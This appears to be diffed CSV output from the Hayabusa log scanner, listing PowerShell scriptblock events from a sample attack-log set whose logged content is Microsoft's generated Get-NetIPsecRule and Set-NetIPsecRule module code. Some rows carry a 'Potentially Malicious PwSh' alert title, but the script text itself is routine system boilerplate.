[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'En",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'En",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,abled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = 